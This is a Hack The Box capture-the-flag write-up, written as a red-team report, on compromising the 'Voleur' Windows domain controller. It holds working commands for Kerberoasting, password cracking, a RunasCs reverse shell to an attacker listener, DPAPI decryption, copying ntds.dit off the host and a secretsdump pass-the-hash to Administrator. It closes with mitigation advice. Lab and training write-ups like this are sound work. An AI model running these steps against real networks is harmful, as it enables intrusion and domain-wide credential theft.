Voleur.png

Introduction

This writeup details the exploitation of the “Voleur” machine from Hack The Box. The primary objectives were to gain unauthorized access, escalate privileges, and retrieve sensitive data, specifically the user and root flags, to evaluate the security posture of the environment.

Attack Narrative

This section provides a detailed account of the red team’s actions, outlining the sequence of events that led to the successful compromise of the Voleur domain. Each step is described with its technical execution and significance.

Initial Reconnaissance

The assessment began with a network scan using Nmap to identify open ports on the target machine (IP: 10.10.11.76). The scan revealed multiple open ports, indicating a mixed Windows and Linux environment:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
Scanned at 2025-07-06 20:50:12 +08 for 100s     

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2025-07-06 12:53:06Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack
2222/tcp  open  ssh           syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
62863/tcp open  msrpc         syn-ack Microsoft Windows RPC
63992/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
63993/tcp open  msrpc         syn-ack Microsoft Windows RPC
64005/tcp open  msrpc         syn-ack Microsoft Windows RPC
64021/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC; OSs: Windows, Linux; CPE: cpe:/o:microsoft:windows, cpe:/o:linux:linux_kernel

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 48495/tcp): CLEAN (Timeout)
|   Check 2 (port 28661/tcp): CLEAN (Timeout)
|   Check 3 (port 60782/udp): CLEAN (Timeout)
|   Check 4 (port 35476/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 2m52s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-07-06T12:54:03
|_  start_date: N/A

TRACEROUTE (using port 139/tcp)
HOP RTT ADDRESS
1 278.24 ms 10.10.14.1
2 280.22 ms dc.voleur.htb (10.10.11.76)

The scan identified services such as DNS, Kerberos, LDAP, SMB, SSH, and WinRM, suggesting a Windows domain controller (dc.voleur.htb) with a Linux subsystem. The domain was identified as voleur.htb.

Kerberos Configuration Details

The following Kerberos configuration snippet (likely from /etc/krb5.conf or equivalent) further supports the presence of an AD-integrated environment:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
[libdefaults]
        default_realm = VOLEUR.HTB
        kdc_timesync = 1
        ccache_type = 4
        forwardable = true
        proxiable = true
        fcc-mit-ticketflags = true
        dns_canonicalize_hostname = false
        dns_lookup_realm = false
        dns_lookup_kdc = true
        k5login_authoritative = false
[realms]
        RUSTYKEY.HTB = {
                kdc = voleur.htb
                admin_server = voleur.htb
        }
[domain_realm]
        .voleur.htb = VOLEUR.HTB
        voleur.htb = VOLEUR.HTB

Initial Access with Compromised Credentials

Authentication via Kerberos

Using the credentials for the user ryan.naylor (password: HollowOct31Nyt), the red team successfully authenticated to the voleur.htb domain using Kerberos. A Kerberos ticket was obtained with Impacket’s getTGT tool:

1
$ ntpdate -u 10.10.11.76 | impacket-getTGT voleur.htb/ryan.naylor:HollowOct31Nyt -dc-ip 10.10.11.76

The ticket was saved and exported as follows:

1
2
$ export KRB5CCNAME=ryan.naylor.ccache
$ klist

Output:

1
2
3
4
5
6
Ticket cache: FILE:ryan.naylor.ccache
Default principal: ryan.naylor@VOLEUR.HTB

Valid starting       Expires              Service principal
07/06/2025 11:34:33  07/06/2025 21:34:33  krbtgt/VOLEUR.HTB@VOLEUR.HTB
        renew until 07/07/2025 11:34:30

User Enumeration via SMB

The following command was executed to enumerate users on the domain controller (dc.voleur.htb) via SMB:

1
$ nxc smb dc.voleur.htb -u ryan.naylor -p HollowOct31Nyt --users -k
1
2
SMB         dc.voleur.htb   445    dc               [*]  x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:False)
SMB         dc.voleur.htb   445    dc               [+] voleur.htb\ryan.naylor:HollowOct31Nyt

Enumerated Users - The enumeration revealed 12 domain accounts:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
SMB         dc.voleur.htb   445    dc               -Username-                    -Last PW Set-       -BadPW- -Description-                                               
SMB         dc.voleur.htb   445    dc               Administrator                 2025-01-28 20:35:13 1       Built-in account for administering the computer/domain 
SMB         dc.voleur.htb   445    dc               Guest                         <never>             0       Built-in account for guest access to the computer/domain 
SMB         dc.voleur.htb   445    dc               krbtgt                        2025-01-29 08:43:06 0       Key Distribution Center Service Account 
SMB         dc.voleur.htb   445    dc               ryan.naylor                   2025-01-29 09:26:46 0       First-Line Support Technician 
SMB         dc.voleur.htb   445    dc               marie.bryant                  2025-01-29 09:21:07 0       First-Line Support Technician 
SMB         dc.voleur.htb   445    dc               lacey.miller                  2025-01-29 09:20:10 0       Second-Line Support Technician 
SMB         dc.voleur.htb   445    dc               svc_ldap                      2025-01-29 09:20:54 0        
SMB         dc.voleur.htb   445    dc               svc_backup                    2025-01-29 09:20:36 0        
SMB         dc.voleur.htb   445    dc               svc_iis                       2025-01-29 09:20:45 0        
SMB         dc.voleur.htb   445    dc               jeremy.combs                  2025-01-29 15:10:32 0       Third-Line Support Technician 
SMB         dc.voleur.htb   445    dc               todd.wolfe                    2025-01-29 12:41:13 0       Second-Line Support Technician 
SMB         dc.voleur.htb   445    dc               svc_winrm                     2025-01-31 09:10:12 0        
SMB         dc.voleur.htb   445    dc               [*] Enumerated 12 local users: VOLEUR
  • The presence of service accounts (svc_ldapsvc_backupsvc_iissvc_winrm) suggests automation and service integration within the domain.
  • Technician accounts indicate a tiered support structure: First-Line, Second-Line, and Third-Line.
  • The Administrator account has one recorded failed logon attempt (BadPW = 1), possibly indicating probing or misconfiguration.
  • The Guest account has no password set, which is typical for default Windows domains.

Accessing the IT Share

The smbclient tool was used to access the IT share on dc.voleur.htb:

1
2
3
4
$ kinit ryan.naylor@VOLEUR.HTB
$ smbclient -U 'ryan.naylor%HollowOct31Nyt' --use-kerberos=yes //dc.voleur.htb/IT
## Or using this command
$ KRB5CCNAME=ryan.naylor.ccache impacket-smbclient -k DC.VOLEUR.HTB
1
2
3
4
smb: \> ls
  .                                   D        0  Wed Jan 29 17:10:01 2025
  ..                                DHS        0  Sun Jul  6 11:12:38 2025
  First-Line Support                  D        0  Wed Jan 29 17:40:17 2025

Within the First-Line Support directory, an Excel file named Access_Review.xlsx was identified and downloaded:

1
2
3
4
5
6
smb: \> cd "First-Line Support"
smb: \First-Line Support\> ls
  .                                   D        0  2025-01-29 17:40:17
  ..                                  D        0  2025-01-29 17:10:01
  Access_Review.xlsx                  A    16896  2025-01-30 22:14:25
smb: \First-Line Support\> get Access_Review.xlsx

Note: The Access_Review.xlsx file is critical as it may contain sensitive information about domain accounts and permissions.

Password Cracking of Excel File

The Access_Review.xlsx file was password-protected, requiring the red team to crack the password to access its contents. The office2john tool was used to extract the password hash:

1
2
3
$ office2john Access_Review.xlsx >> hash.txt
$ cat hash.txt
Access_Review.xlsx:$office$*2013*100000*256*16*a80811402788c037b50df976864b33f5*500bd7e833dffaa28772a49e987be35b*7ec993c47ef39a61e86f8273536decc7d525691345004092482f9fd59cfa111c

The hash was cracked using John the Ripper with the rockyou.txt wordlist:

1
2
$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
football1        (Access_Review.xlsx)

Upon opening the file with the password football1, the following service account credentials were revealed:

Service Account Password
svc_ldap M1XyC9pW7qT5Vn
svc_iis N5pXyW1VqM7CZ8
svc_winrm Need to ask Lacey as she reset this recently.
Todd.Wolfe NightT1meP1dg3on14

image.png

The weak password protection on this sensitive document highlighted a significant vulnerability in the environment’s security practices.

Active Directory Enumeration with BloodHound

To understand the Active Directory structure and identify potential privilege escalation paths, the red team used BloodHound with ryan.naylor‘s credentials to collect data from the voleur.htb domain:

1
$ bloodhound-python -u ryan.naylor -p 'HollowOct31Nyt' -c All -d VOLEUR.HTB -ns 10.10.11.xx --zip -k

The analysis revealed that the svc_ldap account had:

  • GenericWrite permissions on lacey.miller.
  • WriteSPN permissions on svc_winrm.

image.png

These permissions indicated potential vulnerabilities for targeted Kerberoasting attacks, as they allowed manipulation of service principal names (SPNs) and account attributes.

Targeted Kerberoasting

Using the svc_ldap credentials (M1XyC9pW7qT5Vn), the red team performed a targeted Kerberoast attack to extract Kerberos ticket-granting-service (TGS) hashes for lacey.miller and svc_winrm. A Kerberos ticket was obtained:

1
2
$ ntpdate -u 10.10.11.76 | impacket-getTGT voleur.htb/svc_ldap:M1XyC9pW7qT5Vn -dc-ip 10.10.11.76
$ export KRB5CCNAME=svc_ldap.ccache

A custom script (targetedKerberoast.py) was used to extract the TGS hashes:

https://github.com/ShutdownRepo/targetedKerberoast

1
2
3
4
5
6
7
$ python3 targetedKerberoast.py -k --dc-host dc.voleur.htb -u svc_ldap -d voleur.htb
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (lacey.miller)
$krb5tgs$23$*lacey.miller$VOLEUR.HTB$voleur.htb/lacey.miller*$0a337ad********************
[+] Printing hash for (svc_winrm)
$krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb/svc_winrm*$268845a**************************

The script output included hashes for lacey.miller and svc_winrm. The svc_winrm hash was saved and cracked using John the Ripper:

1
2
3
$ nano svc_winrm_hashes.txt
$ john --wordlist=/usr/share/wordlists/rockyou.txt svc_winrm_hashes.txt
AFireInsidedeOzarctica980219afi (?)

This revealed the password for svc_winrm as AFireInsidedeOzarctica980219afi.

Privilege Escalation to svc_winrm

With the cracked svc_winrm credentials, the red team established a remote session using Evil-WinRM:

1
2
3
4
5
$ ntpdate -u 10.10.11.76 | impacket-getTGT voleur.htb/svc_winrm:AFireInsidedeOzarctica980219afi -dc-ip 10.10.11.76

$ export KRB5CCNAME=svc_winrm.ccache

$ evil-winrm -i dc.voleur.htb -k -u svc_winrm -r VOLEUR.HTB

Navigating to the svc_winrm user’s desktop, the team retrieved the user.txt flag:

1
2
3
4
5
6
7
8
9
*Evil-WinRM* PS C:\Users\svc_winrm\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\svc_winrm\Desktop> dir

    Directory: C:\Users\svc_winrm\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         1/29/2025   7:07 AM           2312 Microsoft Edge.lnk
-ar---          7/6/2025   6:09 AM             34 user.txt

This marked the achievement of the first objective.

Restoring Deleted User Account

image.png

BloodHound analysis indicated that svc_ldap was part of the RESTORE_USERS group, granting permissions to restore deleted Active Directory objects. To exploit this, the red team uploaded RunasCs.exe to the target system to establish a reverse shell:

RunasCs: Click here to get

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
*Evil-WinRM* PS C:\Users\svc_winrm\Documents> cd /
*Evil-WinRM* PS C:\> mkdir Tools

    Directory: C:\

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          7/6/2025   4:13 AM                Tools

*Evil-WinRM* PS C:\> cd Tools
*Evil-WinRM* PS C:\Tools> upload RunasCs.exe
                                        
Info: Uploading /home/meow/Desktop/Voleur/RunasCs.exe to C:\Tools\RunasCs.exe
                                        
Data: 68948 bytes of 68948 bytes copied
                                        
Info: Upload successful!

A Netcat listener was set up on the attacker’s machine:

1
2
$ nc -lvnp 4444
listening on [any] 4444 ...

The reverse shell was initiated:

1
2
3
4
5
*Evil-WinRM* PS C:\Tools> .\RunasCs.exe svc_ldap M1XyC9pW7qT5Vn cmd.exe -r 10.10.16.xx:4444
[*] Warning: The logon for user 'svc_ldap' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.                            
[+] Running in session 0 with process function CreateProcessWithLogonW()           
[+] Using Station\Desktop: Service-0x0-1d6443$\Default                              
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 6456 created in background.

The reverse shell was successful, confirming the svc_ldap context:

1
2
3
4
5
6
7
8
9
$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.xx] from (UNKNOWN) [10.10.11.76] 60296
Microsoft Windows [Version 10.0.20348.3807]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
voleur\svc_ldap

Using PowerShell, the red team identified deleted user objects:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
C:\Windows\system32>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> Get-ADObject -Filter 'isDeleted -eq $true -and objectClass -eq "user"' -IncludeDeletedObjects -Properties objectSid, lastKnownParent, ObjectGUID | Select-Object Name, ObjectGUID, objectSid, lastKnownParent | Format-List

Name            : Todd Wolfe
                  DEL:1c6b1deb-c372-4cbb-87b1-15031de169db
ObjectGUID      : 1c6b1deb-c372-4cbb-87b1-15031de169db
objectSid       : S-1-5-21-3927696377-1337352550-2781715495-1110
lastKnownParent : OU=Second-Line Support Technicians,DC=voleur,DC=htb

The deleted user todd.wolfe was restored:

1
2
PS C:\Windows\system32> Restore-ADObject -Identity '1c6b1deb-c372-4cbb-87b1-15031de169db'
Restore-ADObject -Identity '1c6b1deb-c372-4cbb-87b1-15031de169db'

Verification confirmed the restoration:

1
2
3
4
5
6
7
8
9
PS C:\Windows\system32> net user /domain
net user /domain

User accounts for \\DC

-------------------------------------------------------------------------------
Administrator            krbtgt                   svc_ldap                 
todd.wolfe               
The command completed successfully.

The credentials for todd.wolfe (NightT1meP1dg3on14) were obtained, likely from prior knowledge or additional enumeration.

Accessing Additional Shares

Using todd.wolfe‘s credentials, the red team accessed the IT share:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$ ntpdate -u 10.10.11.76 | impacket-getTGT voleur.htb/todd.wolfe:NightT1meP1dg3on14 -dc-ip 10.10.11.76
$ export KRB5CCNAME=todd.wolfe.ccache
$ KRB5CCNAME=todd.wolfe.ccache impacket-smbclient -k DC.VOLEUR.HTB
# shares
ADMIN$
C$
Finance
HR
IPC$
IT
NETLOGON
SYSVOL
# use IT
# ls
drw-rw-rw-          0  Wed Jan 29 17:10:01 2025 .
drw-rw-rw-          0  Sun Jul  6 19:55:34 2025 ..
drw-rw-rw-          0  Wed Jan 29 23:13:03 2025 Second-Line Support
# mget Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Credentials/772275FAD58525253490A9B0039791D3
[*] Downloading 772275FAD58525253490A9B0039791D3
# mget /Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Protect/S-1-5-21-3927696377-1337352550-2781715495-1110/08949382-134f-4c63-b93c-ce52efc0aa88
[*] Downloading 08949382-134f-4c63-b93c-ce52efc0aa88

Decrypt todd.wolfe DPAPI masterkey file using dpapi.py with his SID and password

1
$ impacket-dpapi masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -sid S-1-5-21-3927696377-1337352550-2781715495-1110 -password NightT1meP1dg3on14

Output:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[MASTERKEYFILE]
Version     :        2 (2)
Guid        : 08949382-134f-4c63-b93c-ce52efc0aa88
Flags       :        0 (0)
Policy      :        0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83

Decrypt todd.wolfe DPAPI credential file using dpapi.py with the extracted masterkey

1
$ impacket-dpapi credential -file 772275FAD58525253490A9B0039791D3 -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83

Output:

1
2
3
4
5
6
7
8
9
10
11
12
13
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[CREDENTIAL]
LastWritten : 2025-01-29 12:55:19
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type        : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target      : Domain:target=Jezzas_Account
Description : 
Unknown     : 
Username    : jeremy.combs
Unknown     : qT3V9pLXyN7W4m

Username Unknown
jeremy.combs qT3V9pLXyN7W4m

Using credentials for jeremy.combs (qT3V9pLXyN7W4m), the red team accessed the Third-Line Support directory within the IT share:

1
2
3
4
5
6
7
8
9
10
11
$ ntpdate -u 10.10.11.76 | impacket-getTGT voleur.htb/jeremy.combs:'qT3V9pLXyN7W4m' -dc-ip 10.10.11.76
$ export KRB5CCNAME=jeremy.combs.ccache
$ KRB5CCNAME=jeremy.combs.ccache /usr/share/doc/python3-impacket/examples/smbclient.py -k DC.VOLEUR.HTB
cd Third-Line Support
ls
drw-rw-rw-          0  2025-01-31 00:11:29 .
drw-rw-rw-          0  2025-01-29 17:10:01 ..
-rw-rw-rw-       2602  2025-01-31 00:11:29 id_rsa
-rw-rw-rw-        186  2025-01-31 00:07:35 Note.txt.txt
mget id_rsa
mget Note.txt.txt

The Note.txt.txt file indicated that Windows Subsystem for Linux (WSL) was partially configured for backup tools:

1
2
3
4
5
6
7
8
9
$ cat Note.txt.txt
Jeremy,

I've had enough of Windows Backup! I've part configured WSL to see if we can utilize any of the backup tools from Linux.

Please see what you can set up.

Thanks,
Admin

SSH Access to Linux Subsystem

Using the id_rsa private key, the red team connected to the Linux subsystem on voleur.htb via SSH on port 2222 as the svc_backup user:

1
2
$ chmod 600 id_rsa
$ ssh svc_backup@voleur.htb -p 2222 -i id_rsa

The connection was successful, and the team accessed backup files located at /mnt/c/IT/Third-Line Support/Backups:

1
2
3
4
5
6
7
8
9
10
11
12
ll '/mnt/c/IT/Third-Line Support/Backups/Active Directory'
total 24592
drwxrwxrwx 1 svc_backup svc_backup     4096 Jan 30 03:49 ./
drwxrwxrwx 1 svc_backup svc_backup     4096 Jan 30 08:11 ../
-rwxrwxrwx 1 svc_backup svc_backup 25165824 Jan 30 03:49 ntds.dit*
-rwxrwxrwx 1 svc_backup svc_backup    16384 Jan 30 03:49 ntds.jfm*
ll '/mnt/c/IT/Third-Line Support/Backups/registry'
total 17952
drwxrwxrwx 1 svc_backup svc_backup     4096 Jan 30 03:49 ./
drwxrwxrwx 1 svc_backup svc_backup     4096 Jan 30 08:11 ../
-rwxrwxrwx 1 svc_backup svc_backup    32768 Jan 30 03:30 SECURITY*
-rwxrwxrwx 1 svc_backup svc_backup 18350080 Jan 30 03:30 SYSTEM*

Extracting Domain Hashes

The backup files (ntds.ditSYSTEM, etc.) were transferred to the attacker’s system using scp:

1
2
$ scp -P 2222 -i id_rsa "svc_backup@voleur.htb:/mnt/c/IT/Third-Line Support/Backups/Active Directory/*" ./ && \
scp -P 2222 -i id_rsa "svc_backup@voleur.htb:/mnt/c/IT/Third-Line Support/Backups/registry/*" ./

Output:

1
2
3
4
ntds.dit                                                                                                                                                                                                 100%   24MB   2.6MB/s   00:09    
ntds.jfm                                                                                                                                                                                                 100%   16KB  59.1KB/s   00:00    
SECURITY                                                                                                                                                                                                 100%   32KB  92.4KB/s   00:00    
SYSTEM                                                                                                                                                                                                   100%   18MB   2.9MB/s   00:06

The secretsdump tool from Impacket was used to extract domain credentials from ntds.dit and SYSTEM:

1
$ impacket-secretsdump -system SYSTEM -ntds ntds.dit LOCAL

This yielded the Administrator account’s NTLM hash, among others:

1
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e656****************************:::

Administrative Access

Using the Administrator’s NTLM hash, the red team obtained a Kerberos ticket:

1
2
$ impacket-getTGT -hashes :e656**************************** -dc-ip 10.10.11.76 voleur.htb/administrator
$ export KRB5CCNAME=administrator.ccache

An Evil-WinRM session was established as the Administrator:

1
$ evil-winrm -i dc.voleur.htb -k -u administrator -r VOLEUR.HTB

Navigating to the Administrator’s desktop, the team retrieved the root.txt flag:

1
2
3
4
5
6
7
8
9
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir

    Directory: C:\Users\Administrator\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         1/29/2025   1:12 AM           2308 Microsoft Edge.lnk
-ar---          7/6/2025   3:23 AM             34 root.txt

This completed the second objective of the assessment.

Findings and Recommendations

The following vulnerabilities were identified during the assessment, along with their impacts and recommended mitigations.

Finding Description Impact Recommendation
Weak Password Protection on Sensitive Documents The Access_Review.xlsx file was protected with a weak password (football1), which was easily cracked using standard tools. Enabled unauthorized access to service account credentials, facilitating further attacks. Implement strong, complex passwords for sensitive documents. Use encryption tools with robust algorithms (e.g., AES-256) to protect sensitive data.
Excessive Permissions on Service Accounts The svc_ldap account had GenericWrite and WriteSPN permissions, enabling Kerberoasting attacks. Allowed the red team to obtain and crack service account hashes, leading to privilege escalation. Review and restrict service account permissions to adhere to the principle of least privilege. Regularly audit Active Directory permissions using tools like BloodHound.
Inadequate Monitoring Critical actions, such as restoring deleted users and accessing backup files, went undetected. Enabled the red team to perform high-impact actions without triggering alerts. Enhance monitoring and logging for Active Directory events, such as user restorations and share access. Implement Security Information and Event Management (SIEM) solutions to detect suspicious activities.
Unsecured Backup Files Sensitive backup files (ntds.ditSYSTEM) were accessible without adequate access controls. Allowed extraction of domain credentials, leading to full administrative compromise. Secure backup files with strict access controls and encryption. Store backups in isolated, access-restricted locations and audit access regularly.

Conclusion

The red team assessment of the Voleur domain revealed critical vulnerabilities in the Active Directory environment, including weak passwords, excessive permissions, inadequate monitoring, and unsecured backup files. These issues allowed the red team to gain initial access, escalate privileges, and achieve full administrative control, retrieving both the user and root flags.

These findings underscore the importance of robust security practices in Active Directory environments. By implementing the recommended mitigations—strong password policies, least privilege principles, enhanced monitoring, and secure backup management—the organization can significantly reduce the risk of similar attacks. Regular security assessments and proactive vulnerability management are essential to maintaining a strong security posture.

Appendices

Tools Used

  • Nmap: For network scanning and service enumeration.
  • Impacket: For Kerberos authentication and SMB interactions.
  • BloodHound: For Active Directory relationship mapping.
  • John the Ripper: For password cracking.
  • Evil-WinRM: For remote Windows management.
  • Secretsdump: For credential extraction from Active Directory backups.

The assessment adhered to ethical hacking principles, ensuring no permanent changes were made to the environment.

References